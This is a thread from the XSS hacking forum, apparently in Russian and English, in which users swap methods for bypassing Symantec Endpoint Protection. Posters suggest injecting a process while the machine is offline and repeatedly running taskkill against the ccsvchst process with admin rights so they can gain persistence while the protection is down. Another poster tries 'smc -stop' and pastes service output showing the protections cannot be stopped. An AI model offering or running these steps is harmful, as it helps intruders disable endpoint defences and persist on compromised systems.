• XSS.stack #1 – первый литературный журнал от юзеров форума

AV\EDR Bypassing Symantec endpoint security

Пожалуйста, обратите внимание, что пользователь заблокирован
Symantec uses only cloud
turn off internet, inject process, turn on
Worked some time ago
how he can be still connect if he turn off internet ?
 
если есть права админа надо несколько раз сделать
get-process -name ccsvchst

taskkill /f /im ccsvchst*

потом временно вырубается с ошибкой и можно успеть закрепится.
Иногда работает
 
smc -stop
нельзя же NOT_STOPPABLE, NOT_PAUSABLE тоже ищу как с ним бороться, немного научился обманывать на ps1 скриптах но не с каждым получается.

Код:
SERVICE_NAME: SepMasterService
DISPLAY_NAME: Symantec Endpoint Protection
        TYPE               : 10  WIN32_OWN_PROCESS 
        STATE              : 4  RUNNING
                                (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
SERVICE_NAME: sepWscSvc
DISPLAY_NAME: Symantec Endpoint Protection WSC Service
        TYPE               : 10  WIN32_OWN_PROCESS  
        STATE              : 4  RUNNING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
SERVICE_NAME: SsPaAdm
DISPLAY_NAME: Symantec.cloud Cloud Agent
        TYPE               : 20  WIN32_SHARE_PROCESS  
        STATE              : 4  RUNNING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
SERVICE_NAME: ssPaSetMgr
DISPLAY_NAME: Symantec.cloud Scheduler
        TYPE               : 20  WIN32_SHARE_PROCESS  
        STATE              : 4  RUNNING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
SERVICE_NAME: ssSpnAv
DISPLAY_NAME: Symantec.cloud Endpoint Protection
        TYPE               : 20  WIN32_SHARE_PROCESS  
        STATE              : 4  RUNNING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх